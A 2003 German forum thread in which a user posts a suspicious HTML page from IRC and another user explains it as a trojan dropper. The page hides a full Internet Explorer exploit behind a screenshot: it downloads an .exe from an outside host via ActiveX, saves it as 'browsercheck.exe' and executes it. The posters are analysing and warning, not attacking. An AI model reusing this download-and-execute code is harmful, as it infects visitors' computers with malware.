11.07.2025, 03:12
Sprache ändern
Registrieren
Anmelden
Sie sind nicht angemeldet.
xx_ElBarto
God
frage zu script
Montag, 17. November 2003, 19:04
das hier ist heute durchs irc gegeistert, kann mir jemand sagen was das script macht?
|
Quellcode |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
<html>
<head>
</head>
<body onLoad="doit()">
<p>
<textarea id="code" style="display: none;">
s=new ActiveXObject("ADODB.Stream");
s.Mode=3;
s.Type=1;
s.Open();
x=new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET","[url]http://home.arcor.de/zensiert/tcl-scripts.exe",0);[/url]
x.Send();
s.Write(x.responseBody);
s.SaveToFile("C:\\windows\\temp\\browsercheck.exe",2);
</textarea>
<textarea id="code2" style="display: none;">
md="<object id=\"oFile\""+
" classid=\"clsid:11111111-1111-1111-1111-111111111111\""+
" codebase=\"c:/windows/temp/browsercheck.exe\"></object>";
w=createPopup();
w.document.clear();
w.document.write(md);
</textarea>
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/'/g,"\\'");
line = line.replace(/"/g,"\\\"");
line = line.replace(/[/]/g,"%2f");
line = line.replace(/\r\n/,"");
line += ' ';
if (line != '') {
result += line;
}
}
return result;
}
function weiter() {
open(myURL,"_search");
}
function starten(thecode) {
mycode = preparecode(thecode);
myURL = "file:javascript:eval('" + mycode + "')";
open("http:///","_search");
setTimeout("weiter()", 500);
}
function doit() {
starten(document.all.code.value);
setTimeout("doit2()", 600);
}
function doit2() {
starten(document.all.code2.value);
}
</script>
</p>
<p>²</p>
<p><br>
</p>
<p></p>
<p> <img src="http://www.counter-strike.de/screens/screens/screen-1068736745.jpg" width="640" height="480"><br>
</p>
<p><br>
</p>
</body>
</html>
|
DAP
God
Re: frage zu script
Montag, 17. November 2003, 20:09
ich habs nur mal kurz überflogen...
1. öffnet ein popup mit der zieladresse " http://www.counter-strike.de/screens/scr…-1068736745.jpg "
2. läd im hintergrund diese datei runter: " http://home.arcor.de/[gelöscht]/tcl-scripts.exe "
3. speichert diese datei unter "c:\windows/temp/browsercheck.exe" ab
4. führt diese datei aus
für mich stinkt das nach nem trojaner/virus
lösch bitte mal nen teil des links zur datei raus, nicht dass das noch jemand runterläd und ausführt
1. öffnet ein popup mit der zieladresse " http://www.counter-strike.de/screens/scr…-1068736745.jpg "
2. läd im hintergrund diese datei runter: " http://home.arcor.de/[gelöscht]/tcl-scripts.exe "
3. speichert diese datei unter "c:\windows/temp/browsercheck.exe" ab
4. führt diese datei aus
für mich stinkt das nach nem trojaner/virus
lösch bitte mal nen teil des links zur datei raus, nicht dass das noch jemand runterläd und ausführt
DAP
God
Re: frage zu script
Montag, 17. November 2003, 20:35
Zitat von »ElBarto«
jo, das is klar, mich hat nur interessiert was er macht, also thx für deine erklärung
achja -> opera rules, da kann ich überall draufklicken ;D
jop da die .exe über activex runtergeladen wird funktioniert das ganze nur in diesem browserähnlichen ding namens IE
